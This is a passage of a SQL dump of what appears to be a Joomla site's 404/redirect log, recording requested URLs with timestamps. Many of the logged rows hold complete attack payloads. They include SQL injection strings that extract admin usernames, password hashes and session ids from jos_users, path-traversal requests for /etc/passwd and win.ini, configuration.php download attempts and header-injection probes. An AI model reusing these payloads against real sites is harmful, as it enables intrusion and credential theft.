00:00:00'),(136,'http://192.168.1.10/joomla/2013/it_university2/index.php/en/','','http://192.168.1.10/joomla/2013/it_university2/index.php/de/','',1,0,'2013-05-10 10:19:45','0000-00-00 00:00:00'),(137,'http://192.168.1.10/joomla/2013/it_university2/index.php/en/theme/custom-pages/portfolio','','http://192.168.1.10/joomla/2013/it_university2/index.php/en/theme/custom-pages','',1,0,'2013-05-10 10:19:51','0000-00-00 00:00:00'),(138,'http://192.168.1.10/joomla/2013/it_university2/index.php/en/theme/custom-pages/photo-gallery','','http://192.168.1.10/joomla/2013/it_university2/index.php/en/theme/custom-pages','',1,0,'2013-05-10 10:19:56','0000-00-00 00:00:00'),(139,'http://192.168.1.10/joomla/2013/it_university2/index.php/en/theme/custom-pages/services','','http://192.168.1.10/joomla/2013/it_university2/index.php/en/theme/custom-pages','',1,0,'2013-05-10 10:20:02','0000-00-00 00:00:00'),(140,'http://192.168.1.10/joomla/2013/it_university2/index.php/en/theme/custom-pages/faq','','http://192.168.1.10/joomla/2013/it_university2/index.php/en/theme/custom-pages','',1,0,'2013-05-10 10:20:08','0000-00-00 00:00:00'),(141,'http://192.168.1.10/joomla/2013/it_university2/index.php/en/theme/custom-pages/testimonials','','http://192.168.1.10/joomla/2013/it_university2/index.php/en/theme/custom-pages','',1,0,'2013-05-10 10:20:15','0000-00-00 00:00:00'),(142,'http://192.168.1.10/joomla/2013/it_university2/index.php/en/theme/module-variations','','http://192.168.1.10/joomla/2013/it_university2/','',1,0,'2013-05-10 10:21:51','0000-00-00 00:00:00'),(143,'http://192.168.1.10/joomla/2013/it_university2/index.php/404','','http://192.168.1.10/joomla/2013/it_university2/index.php/theme','',1,0,'2013-05-13 13:11:10','0000-00-00 00:00:00'),(144,'http://192.168.1.10/joomla/2013/it_university2/index.php/404/theme/custom-pages/about-us','','http://192.168.1.10/joomla/2013/it_university2/index.php/theme/custom-pages/about-us','',1,0,'2013-05-16 13:42:51','0000-00-00 00:00:00'),(145,'http://192.168.5.10/joomla/2013/it_property2/index.php/404','','http://192.168.5.10/joomla/2013/it_property2/index.php/theme/iceshortcodes','',1,0,'2013-06-11 12:51:21','0000-00-00 00:00:00'),(146,'http://192.168.1.10/joomla/2013/it_healthcare2/index.php/theme/custom-pages/photo-gallery','','','',1,0,'2013-07-01 09:46:39','0000-00-00 00:00:00'),(147,'http://192.168.1.10/joomla/2013/it_healthcare2/index.php/theme/custom-pages/%27.$item-%3Eimgfull.%27','','http://192.168.1.10/joomla/2013/it_healthcare2/index.php/theme/custom-pages/photo-gallery','',1,0,'2013-07-01 09:56:19','0000-00-00 00:00:00'),(148,'http://192.168.1.10/joomla/2013/it_healthcare2/index.php/404','','http://192.168.1.10/joomla/2013/it_healthcare2/','',1,0,'2013-07-02 08:12:53','0000-00-00 00:00:00'),(149,'http://192.168.1.10/joomla/2013/it_healthcare2/index.php/theme/images/logo/style3/logo.png','','http://192.168.1.10/joomla/2013/it_healthcare2/index.php/theme/module-variations','',1,0,'2013-07-04 12:44:55','0000-00-00 00:00:00'),(150,'http://192.168.1.10/joomla/2013/it_enterprise/index.php/theme/module-variations.','','','',1,0,'2013-07-22 09:16:43','0000-00-00 00:00:00'),(151,'http://192.168.1.10/joomla/2013/it_enterprise/index.php/theme/templates/it_political/css/styles/style1.css','','http://192.168.1.10/joomla/2013/it_enterprise/index.php/theme/module-variations.','',1,0,'2013-07-22 09:16:45','0000-00-00 00:00:00'),(152,'http://192.168.1.10/joomla/2013/it_enterprise/index.php/theme/media/jui/css/bootstrap-responsive.css','','http://192.168.1.10/joomla/2013/it_enterprise/index.php/theme/module-variations.','',1,0,'2013-07-22 09:16:45','0000-00-00 00:00:00'),(153,'http://192.168.1.10/joomla/2013/it_enterprise/index.php/theme/images/sampledata/icetheme/logo.png','','http://192.168.1.10/joomla/2013/it_enterprise/index.php/theme/module-variations.','',1,0,'2013-07-22 09:16:45','0000-00-00 00:00:00'),(154,'http://192.168.1.10/joomla/2013/it_enterprise/index.php/theme/media/jui/css/bootstrap.css','','http://192.168.1.10/joomla/2013/it_enterprise/index.php/theme/module-variations.','',1,0,'2013-07-22 09:16:45','0000-00-00 00:00:00'),(155,'http://192.168.1.10/joomla/2013/it_enterprise/index.php/theme/templates/it_political/css/general.css','','http://192.168.1.10/joomla/2013/it_enterprise/index.php/theme/module-variations.','',1,0,'2013-07-22 09:16:45','0000-00-00 00:00:00'),(156,'http://192.168.1.10/joomla/2013/it_enterprise/index.php/theme/templates/it_political/favicon.ico','','','',1,0,'2013-07-22 09:16:47','0000-00-00 00:00:00'),(157,'http://192.168.1.10/joomla/2013/it_enterprise/index.php/404','','http://192.168.1.10/joomla/2013/it_enterprise/','',1,0,'2013-07-26 09:10:22','0000-00-00 00:00:00'),(158,'http://192.168.1.10/joomla/2013/it_enterprise/index.php/404/theme/custom-pages','','http://192.168.1.10/joomla/2013/it_enterprise/index.php/theme/custom-pages','',1,0,'2013-08-27 10:14:05','0000-00-00 00:00:00'),(159,'http://leader.budennovsk.ru/index.php/deyatelnost/lokalnaya-ochistka-truboprovodov','','http://leader.budennovsk.ru/index.php/predlozheniya','',1,0,'2014-12-07 14:54:30','0000-00-00 00:00:00'),(160,'http://leader.budennovsk.ru/index.php/images/leader/06/06-head.jpg','','','',1,0,'2014-12-12 18:32:16','0000-00-00 00:00:00'),(161,'http://leader.budennovsk.ru/index.php/images/leader/07/07-head.jpg','','','',1,0,'2014-12-12 20:53:05','0000-00-00 00:00:00'),(162,'http://www.lider-26.ru/index.php/deyatelnost/lokalnaya-ochistka-truboprovodov','','','',1,0,'2015-02-07 02:35:46','0000-00-00 00:00:00'),(163,'http://lider-26.ru/index.php/deyatelnost/lokalnaya-ochistka-truboprovodov','','','',1,0,'2015-02-07 20:27:15','0000-00-00 00:00:00'),(164,'http://www.lider-26.ru/index.php/images/leader/06/06-head.jpg','','','',1,0,'2015-03-10 20:52:40','0000-00-00 00:00:00'),(165,'http://www.lider-26.ru/index.php/images/leader/07/07-head.jpg','','','',1,0,'2015-03-10 20:54:45','0000-00-00 00:00:00'),(166,'http://lider-26.ru/index.php?option=com_user&view=register','','','',1,0,'2015-03-11 03:16:05','0000-00-00 00:00:00'),(167,'http://lider-26.ru/index.php/admin/','','','',1,0,'2015-04-01 12:00:11','0000-00-00 00:00:00'),(168,'http://lider-26.ru/index.php/http://www..ru','','','',1,0,'2015-04-15 11:45:23','0000-00-00 00:00:00'),(169,'http://lider-26.ru/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2015-05-08 02:34:07','0000-00-00 00:00:00'),(170,'http://lider-26.ru/index.php?option=com_adsmanager&task=upload&tmpl=component','','','',1,0,'2015-07-08 23:28:35','0000-00-00 00:00:00'),(171,'http://lider-26.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743','','','',1,0,'2015-08-25 04:52:31','0000-00-00 00:00:00'),(172,'http://lider-26.ru/index.php?option=com_idoblog&task=profile&userblog&userid=63+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables+where+table_name+like+0x257573657273+--','','http://lider-26.ru/index.php?option=com_idoblog&task=profile&userblog&userid=63+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16+from+info','',1,0,'2015-10-05 07:09:10','0000-00-00 00:00:00'),(173,'http://lider-26.ru/index.php?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=-1+union+select+1,table_name+from+information_schema.tables+where+table_name+like+0x257573657273+--','','http://lider-26.ru/index.php?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=-1+union+select+1,table_name+from+information_schema.ta','',1,0,'2015-10-05 07:09:10','0000-00-00 00:00:00'),(174,'http://lider-26.ru/index.php?option=com_ignitegallery&task=view&gallery=-7+union+select+1,2,table_name,4,5,6,7,8,9,10+from+information_schema.tables+where+table_name+like+0x257573657273--&Itemid=67','','http://lider-26.ru/index.php?option=com_ignitegallery&task=view&gallery=-7+union+select+1,2,table_name,4,5,6,7,8,9,10+from+information_schema.tables+w','',1,0,'2015-10-05 07:09:10','0000-00-00 00:00:00'),(175,'http://lider-26.ru/index.php?option=com_easybook&itemid=1&func=deleteentry&md=aa7bf14b4c89a884b633e825099e61c4&gbid=-1+union+select+1,2,concat(0x7e,table_name,0x7e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+information_schema.tables+where+table_name+','','http://lider-26.ru/index.php?option=com_easybook&itemid=1&func=deleteentry&md=aa7bf14b4c89a884b633e825099e61c4&gbid=-1+union+select+1,2,concat(0x7e,ta','',1,0,'2015-10-05 07:09:10','0000-00-00 00:00:00'),(176,'http://lider-26.ru/index.php?option=com_rsgallery2&page=inline&id=421&catid=-12+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12,13+from+information_schema.tables+where+table_name+like+0x257573657273+--&limitstart=15','','http://lider-26.ru/index.php?option=com_rsgallery2&page=inline&id=421&catid=-12+union+select+1,2,3,4,table_name,6,7,8,9,10,11,12,13+from+information_s','',1,0,'2015-10-05 07:09:10','0000-00-00 00:00:00'),(177,'http://lider-26.ru/index.php?view=videos&type=member&user_id=-66+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+information_schema.tables+where+table_name+like+0x257573657273%20--%20;&option=com_mytube','','http://lider-26.ru/index.php?view=videos&type=member&user_id=-66+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,','',1,0,'2015-10-05 07:10:05','0000-00-00 00:00:00'),(178,'http://lider-26.ru/index.php?view=videos&type=member&user_id=-62+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+information_schema.tables+where+table_name+like+0x257573657273%20--%20;&option=com_jomtube','','http://lider-26.ru/index.php?view=videos&type=member&user_id=-62+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,','',1,0,'2015-10-05 07:10:05','0000-00-00 00:00:00'),(179,'http://lider-26.ru/index.php?option=com_ignitegallery&task=view&gallery=-8+union+select+1,2,concat(0x7e,table_name,0x7e),4,5,6,7,8,9,10+from+information_schema.tables+where+table_name=0x4348415241435445525f53455453--&Itemid=6','','http://lider-26.ru/index.php?option=com_ignitegallery&task=view&gallery=-8+union+select+1,2,concat(0x7e,table_name,0x7e),4,5,6,7,8,9,10+from+informati','',1,0,'2015-10-05 13:02:45','0000-00-00 00:00:00'),(180,'http://lider-26.ru/index.php?option=com_easybook&itemid=1&func=deleteentry&md=aa7bf14b4c89a884b633e825099e61c4&gbid=-1+union+select+1,2,concat(0x7e,table_name,0x7e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+information_schema.tables+where+table_name=','','http://lider-26.ru/index.php?option=com_easybook&itemid=1&func=deleteentry&md=aa7bf14b4c89a884b633e825099e61c4&gbid=-1+union+select+1,2,concat(0x7e,ta','',1,0,'2015-10-05 13:02:45','0000-00-00 00:00:00'),(181,'http://lider-26.ru/index.php?option=com_idoblog&task=profile&userblog&userid=63+union+select+1,2,concat(0x7e,table_name,0x7e),4,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables+where+table_name=0x4348415241435445525f53455453--','','http://lider-26.ru/index.php?option=com_idoblog&task=profile&userblog&userid=63+union+select+1,2,concat(0x7e,table_name,0x7e),4,5,6,7,8,9,10,11,12,13,','',1,0,'2015-10-05 13:02:45','0000-00-00 00:00:00'),(182,'http://lider-26.ru/index.php?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=-1+union+select+1,concat(0x7e,table_name,0x7e)+from+information_schema.tables+where+table_name=0x4348415241435445525f53455453--','','http://lider-26.ru/index.php?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=-1+union+select+1,concat(0x7e,table_name,0x7e)+from+inf','',1,0,'2015-10-05 13:03:32','0000-00-00 00:00:00'),(183,'http://lider-26.ru/index.php?view=videos&type=member&user_id=-66+union+select+1,2,concat(0x7e,table_name,0x7e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+information_schema.tables+where+table_name=0x4348415241435445525f53455453%20','','http://lider-26.ru/index.php?view=videos&type=member&user_id=-66+union+select+1,2,concat(0x7e,table_name,0x7e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,','',1,0,'2015-10-05 13:03:33','0000-00-00 00:00:00'),(184,'http://lider-26.ru/index.php?option=com_rsgallery2&page=inline&id=421&catid=-12+union+select+1,2,3,4,concat(0x7e,table_name,0x7e),6,7,8,9,10,11,12,13+from+information_schema.tables+where+table_name=0x4348415241435445525f53455453+--&limitstart=15','','http://lider-26.ru/index.php?option=com_rsgallery2&page=inline&id=421&catid=-12+union+select+1,2,3,4,concat(0x7e,table_name,0x7e),6,7,8,9,10,11,12,13+','',1,0,'2015-10-05 13:03:33','0000-00-00 00:00:00'),(185,'http://lider-26.ru/index.php?view=videos&type=member&user_id=-62+union+select+1,2,concat(0x7e,table_name,0x7e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+information_schema.tables+where+table_name=0x4348415241435445525f53455453','','http://lider-26.ru/index.php?view=videos&type=member&user_id=-62+union+select+1,2,concat(0x7e,table_name,0x7e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,','',1,0,'2015-10-05 13:03:33','0000-00-00 00:00:00'),(186,'http://lider-26.ru//index.php?option=com_adsmanager&task=upload&tmpl=component','','','',1,0,'2015-10-06 17:15:57','0000-00-00 00:00:00'),(187,'http://lider-26.ru/?view=history&list[select]=extractvalue(rand(),concat(0x3a,(sElect(EXP(2))),0x3a,user()))&option=com_contenthistory','','','',1,0,'2015-10-26 16:46:15','0000-00-00 00:00:00'),(188,'http://lider-26.ru/index.php?option=com_myblog&task=ajaxupload','','','',1,0,'2015-10-28 17:38:53','0000-00-00 00:00:00'),(189,'http://lider-26.ru/index.php?option=com_contenthistory&view=history&item_id=1&type_id=1&list[ordering]&list[select]=(select%201%20from%20(select%20count(*),concat((select%20username%20from%20%23__users%20limit%200,1),floor(rand(0)*2))%20from%20information','','','',1,0,'2015-10-28 19:42:06','0000-00-00 00:00:00'),(190,'http://lider-26.ru/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(ExtractValue(1,(select','','','',1,0,'2015-10-28 23:27:43','0000-00-00 00:00:00'),(192,'http://lider-26.ru/index.php','','http://lider-26.ru/','',1,0,'2015-10-30 17:29:08','0000-00-00 00:00:00'),(193,'http://lider-26.ru/index.php/using-joomla/extensions/components/users-component/registration-form','','http://lider-26.ru/index.php/using-joomla/extensions/components/users-component/registration-form','',1,0,'2015-11-01 12:02:02','0000-00-00 00:00:00'),(194,'http://lider-26.ru/index.php?option=com_jetext&task=download&file=../../configuration.php','','','',1,0,'2015-11-01 16:58:50','0000-00-00 00:00:00'),(195,'http://lider-26.ru/index.php?option=com_cckjseblod&task=download&file=configuration.php','','','',1,0,'2015-11-03 16:52:50','0000-00-00 00:00:00'),(196,'http://lider-26.ru/index.php/images/leader/06/06-head.jpg','','','',1,0,'2015-11-03 17:40:30','0000-00-00 00:00:00'),(197,'http://lider-26.ru/index.php?option=com_contenthistory&view=history&list%5Bordering%5D=&item_id=75&type_id=1&list%5Bselect%5D=(ExtractValue(1,(select%20concat(0x3a676f6f643a))))','','','',1,0,'2015-11-15 01:12:21','0000-00-00 00:00:00'),(198,'http://lider-26.ru/index.php?option=com_easyblog','','http://lider-26.ru/index.php?option=com_easyblog','',1,0,'2015-11-19 18:34:01','0000-00-00 00:00:00'),(199,'http://lider-26.ru/index.php/images/leader/07/07-head.jpg','','','',1,0,'2015-11-23 19:56:29','0000-00-00 00:00:00'),(208,'http://lider-26.ru/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(ExtractValue(1,(select%20concat_ws(0x3a,user(),version(),database()))))','','','',1,0,'2015-12-25 04:00:10','0000-00-00 00:00:00'),(209,'http://lider-26.ru/?option=com_user&view=register','','LIDER-26.RU/?option=com_user&view=register','',1,0,'2015-12-31 08:19:28','0000-00-00 00:00:00'),(210,'http://lider-26.ru/index.php?option=com_community&view=videos&groupid=%28select%201%20from%28select%20count%28*%29,concat%28%28select%20substring%28password,1,32%29%20from%20jos_users%20where%20usertype=0x73757065722061646d696e6973747261746f72%20limit%200','','','',1,0,'2016-01-07 14:05:44','0000-00-00 00:00:00'),(211,'http://lider-26.ru/index.php?option=com_community&view=videos&groupid=%28select%201%20from%28select%20count%28*%29,concat%28%28select%20substring%28password,34,64%29%20from%20jos_users%20where%20usertype=0x73757065722061646d696e6973747261746f72%20limit%20','','','',1,0,'2016-01-07 14:05:49','0000-00-00 00:00:00'),(212,'http://lider-26.ru/index.php?option=com_community&view=videos&groupid=%28select%201%20from%28select%20count%28*%29,concat%28%28select%20username%20from%20jos_users%20where%20usertype=0x73757065722061646d696e6973747261746f72%20limit%200,1%29,floor%28rand%2','','','',1,0,'2016-01-07 14:05:50','0000-00-00 00:00:00'),(213,'http://lider-26.ru/index.php?option=com_community&view=frontpage','','','',1,0,'2016-02-21 21:14:25','0000-00-00 00:00:00'),(214,'http://lider-26.ru/index.php?option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),4,5,6,7,8,9,10+from+jos_users+where+gid=24+limit+0,1--','','','',1,0,'2016-03-22 01:41:24','0000-00-00 00:00:00'),(215,'http://lider-26.ru/index.php?option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),4,5,6,7,8,9,10+from+jos_users+where+gid=25+limit+0,1--','','','',1,0,'2016-03-22 01:41:27','0000-00-00 00:00:00'),(216,'http://lider-26.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form','','','',1,0,'2016-03-27 15:40:06','0000-00-00 00:00:00'),(217,'http://lider-26.ru/?view=videos&type=member&user_id=1%20and%201=0%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,concat%280x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e%29,14,15,16,17,18,19,20,21,22,23,24,25,26,27%20from+jos_use','','','',1,0,'2016-03-31 04:19:44','0000-00-00 00:00:00'),(219,'http://lider-26.ru/index.php?view=videos&type=member&user_id=66+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat%280x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e%29,14,15,16,17,18,19,20,21,22,23,24,25,26+from+jos_users+wh','','','',1,0,'2016-03-31 05:42:33','0000-00-00 00:00:00'),(221,'http://lider-26.ru/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=%20%28select%201%3Dupdatexml%281%2Cconcat%280x5e24%2C%28select%20session_id%20from%20bmqkn_session%20where%20guest%3D0%20limit%200%2C1%29','','','',1,0,'2016-04-05 12:28:30','0000-00-00 00:00:00'),(223,'http://lider-26.ru/index.php/login-form','','','',1,0,'2016-05-22 18:53:09','0000-00-00 00:00:00'),(224,'http://lider-26.ru/index.php/login','','','',1,0,'2016-05-22 18:53:09','0000-00-00 00:00:00'),(225,'http://lider-26.ru/index.php/register','','','',1,0,'2016-05-22 18:53:10','0000-00-00 00:00:00'),(226,'http://lider-26.ru/index.php/log-out','','','',1,0,'2016-05-22 18:53:10','0000-00-00 00:00:00'),(227,'http://lider-26.ru/index.php/using-joomla/extensions/components/users-component/login-form','','','',1,0,'2016-05-22 18:53:12','0000-00-00 00:00:00'),(228,'http://lider-26.ru/index.php?option=com_k2&view=itemlist&task=user&id=984','','lider-26.ru/','',1,0,'2016-05-24 01:31:11','0000-00-00 00:00:00'),(229,'http://lider-26.ru/index.php/component/k2/itemlist/user/984','','lider-26.ru/','',1,0,'2016-05-24 01:31:12','0000-00-00 00:00:00'),(230,'http://lider-26.ru/index.php?option=com_easyblog&view=dashboard&layout=write','','http://lider-26.ru','',1,0,'2016-06-01 16:55:39','0000-00-00 00:00:00'),(231,'http://lider-26.ru/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',1,0,'2016-06-20 13:38:01','0000-00-00 00:00:00'),(232,'http://lider-26.ru/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(select+1+FROM(select+count(*),concat((select+substring(username,1,100)+FROM+jos_users+WHERE+id=(SELECT+user_id+FROM+jos_user_usergroup_ma','','','',1,0,'2016-07-03 06:22:22','0000-00-00 00:00:00'),(234,'http://lider-26.ru/index.php?option=com_jdownloads&view=upload','','','',1,0,'2016-07-07 04:58:15','0000-00-00 00:00:00'),(235,'http://www.lider-26.ru/index.php/contact+[PLM=0][N]+GET+http://www.lider-26.ru/index.php/contact+[0,19786,22040]+-%3E+[N]+POST+http://www.lider-26.ru/index.php/contact+[R=303][7198,0,240]','','http://www.lider-26.ru/index.php/contact+[PLM=0][N]+GET+http://www.lider-26.ru/index.php/contact+[0,19786,22040]+-%3E+[N]+POST+http://www.lider-26.ru/','',1,0,'2016-08-15 06:16:02','0000-00-00 00:00:00'),(236,'http://lider-26.ru/index.php?option=com_tag&controller=tag&task=add&article_id=-260479/**//*!union*//**//*!select*//**/concat(username,0x3a,password,0x3a,usertype)/**//*!from*//**/jos_users/**/&tmpl=component','','','',1,0,'2016-08-26 04:17:55','0000-00-00 00:00:00'),(237,'http://lider-26.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b','','','',1,0,'2016-08-27 00:59:21','0000-00-00 00:00:00'),(238,'http://lider-26.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20','','','',1,0,'2016-08-27 00:59:22','0000-00-00 00:00:00'),(239,'http://www.lider-26.ru/index.php/component','','','',1,0,'2016-08-27 01:24:11','0000-00-00 00:00:00'),(240,'http://www.lider-26.ru/index.php/images/leader/07','','','',1,0,'2016-08-27 01:24:24','0000-00-00 00:00:00'),(241,'http://www.lider-26.ru/index.php/images/leader','','','',1,0,'2016-08-27 01:24:24','0000-00-00 00:00:00'),(242,'http://www.lider-26.ru/index.php/images/leader/06','','','',1,0,'2016-08-27 01:24:25','0000-00-00 00:00:00'),(243,'http://www.lider-26.ru/index.php/images/leader/02','','','',1,0,'2016-08-27 01:24:25','0000-00-00 00:00:00'),(244,'http://www.lider-26.ru/index.php/images','','','',1,0,'2016-08-27 01:24:25','0000-00-00 00:00:00'),(245,'http://www.lider-26.ru/index.php/theme/module-positions','','http://www.lider-26.ru/index.php/images/leader/03','',1,0,'2016-08-27 01:24:34','0000-00-00 00:00:00'),(246,'http://www.lider-26.ru/index.php/9-icetheme','','','',1,0,'2016-08-27 01:24:35','0000-00-00 00:00:00'),(247,'http://www.lider-26.ru/index.php/theme','','','',1,0,'2016-08-27 01:24:35','0000-00-00 00:00:00'),(248,'http://www.lider-26.ru/index.php/26-icetheme','','','',1,0,'2016-08-27 01:24:41','0000-00-00 00:00:00'),(249,'http://www.lider-26.ru/index.php/9-icetheme/index.php','','','',1,0,'2016-08-27 01:24:52','0000-00-00 00:00:00'),(250,'http://www.lider-26.ru/index.php/images/sampledata','','','',1,0,'2016-08-27 01:24:58','0000-00-00 00:00:00'),(251,'http://www.lider-26.ru/index.php/images/sampledata/icetheme','','','',1,0,'2016-08-27 01:24:58','0000-00-00 00:00:00'),(252,'http://www.lider-26.ru/index.php/20-icetheme/icefilter-gallery/268435455-skype-for-windows-8-preview-now-available','','','',1,0,'2016-08-27 01:28:36','0000-00-00 00:00:00'),(253,'http://www.lider-26.ru/index.php/20-icetheme/icefilter-gallery/%e3h-skype-for-windows-8-preview-now-available','','','',1,0,'2016-08-27 01:28:36','0000-00-00 00:00:00'),(254,'http://www.lider-26.ru/index.php/20-icetheme/icefilter-gallery/..%c0%af-skype-for-windows-8-preview-now-available','','','',1,0,'2016-08-27 01:28:37','0000-00-00 00:00:00'),(255,'http://www.lider-26.ru/index.php/20-icetheme/icefilter-gallery/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd-skype-for-windows-8-preview-now-available','','','',1,0,'2016-08-27 01:29:07','0000-00-00 00:00:00'),(256,'http://www.lider-26.ru/index.php/20-icetheme/icefilter-gallery/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini-skype-for-windows-8-preview','','','',1,0,'2016-08-27 01:29:09','0000-00-00 00:00:00'),(257,'http://www.lider-26.ru/index.php/20-icetheme/icefilter-gallery/20-..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd-8-preview-now-available','','','',1,0,'2016-08-27 01:29:21','0000-00-00 00:00:00'),(258,'http://www.lider-26.ru/index.php/20-icetheme/icefilter-gallery/%bf%27%bf%22-skype-for-windows-8-preview-now-available','','','',1,0,'2016-08-27 01:29:30','0000-00-00 00:00:00'),(259,'http://www.lider-26.ru/index.php/20-icetheme/icefilter-gallery/%f0%27%27%f0%22%22-skype-for-windows-8-preview-now-available','','','',1,0,'2016-08-27 01:29:30','0000-00-00 00:00:00'),(260,'http://www.lider-26.ru/index.php/20-icetheme/icefilter-gallery/25-5-skype-for-windows-8-preview-now-available','','','',1,0,'2016-08-27 01:29:32','0000-00-00 00:00:00'),(261,'http://www.lider-26.ru/index.php/20-icetheme/icefilter-gallery/20-skype-for-windows-..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd-preview-now-available','','','',1,0,'2016-08-27 01:29:50','0000-00-00 00:00:00'),(262,'http://www.lider-26.ru/index.php/20-icetheme/icefilter-gallery/20-skype-for-windows-8-..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd','','','',1,0,'2016-08-27 01:30:16','0000-00-00 00:00:00'),(263,'http://www.lider-26.ru/index.php/component/','','','',1,0,'2016-08-27 01:30:35','0000-00-00 00:00:00'),(264,'http://www.lider-26.ru/index.php/%0d%0a%20SomeCustomInjectedHeader%3ainjected_by_wvs-icetheme/index.php/theme/module-positions','','','',1,0,'2016-08-27 01:32:52','0000-00-00 00:00:00'),(265,'http://www.lider-26.ru/index.php/%26dir-icetheme/index.php/theme/module-positions','','','',1,0,'2016-08-27 01:32:54','0000-00-00 00:00:00'),(266,'http://www.lider-26.ru/index.php/%7cdir-icetheme/index.php/theme/module-positions','','','',1,0,'2016-08-27 01:32:55','0000-00-00 00:00:00'),(267,'http://www.lider-26.ru/index.php/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd-icetheme/index.php/theme/module-positions','','','',1,0,'2016-08-27 01:32:59','0000-00-00 00:00:00'),(268,'http://www.lider-26.ru/index.php/Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n-icetheme/index.php/theme/module-positions','','','',1,0,'2016-08-27 01:33:01','0000-00-00 00:00:00'),(269,'http://www.lider-26.ru/index.php/1some_inexistent_file_with_long_name-icetheme/index.php/theme/module-positions','','','',1,0,'2016-08-27 01:33:01','0000-00-00 00:00:00'),(270,'http://www.lider-26.ru/index.php/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.png-icetheme/index.php/theme/module-positions','','','',1,0,'2016-08-27 01:33:01','0000-00-00 00:00:00'),(271,'http://www.lider-26.ru/index.php/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd-icetheme/index.php/theme/module-positions','','','',1,0,'2016-08-27 01:33:02','0000-00-00 00:00:00'),(272,'http://www.lider-26.ru/index.php/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini-icetheme/index.php/theme/module-positions','','','',1,0,'2016-08-27 01:33:04','0000-00-00 00:00:00'),(273,'http://www.lider-26.ru/index.php/................windowswin.ini-icetheme/index.php/theme/module-positions','','','',1,0,'2016-08-27 01:33:05','0000-00-00 00:00:00'),(274,'http://www.lider-26.ru/index.php/-icetheme/index.php/theme/module-positions','','','',1,0,'2016-08-27 01:33:05','0000-00-00 00:00:00'),(275,'http://www.lider-26.ru/index.php/268435455-icetheme/index.php/theme/module-positions','','','',1,0,'2016-08-27 01:33:06','0000-00-00 00:00:00'),(276,'http://www.lider-26.ru/index.php/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini-icetheme/index.php/theme/module-positions','','','',1,0,'2016-08-27 01:33:06','0000-00-00 00:00:00'),(277,'http://www.lider-26.ru/index.php/%e3h-icetheme/index.php/theme/module-positions','','','',1,0,'2016-08-27 01:33:07','0000-00-00 00:00:00'),(278,'http://www.lider-26.ru/index.php/..%c0%af-icetheme/index.php/theme/module-positions','','','',1,0,'2016-08-27 01:33:08','0000-00-00 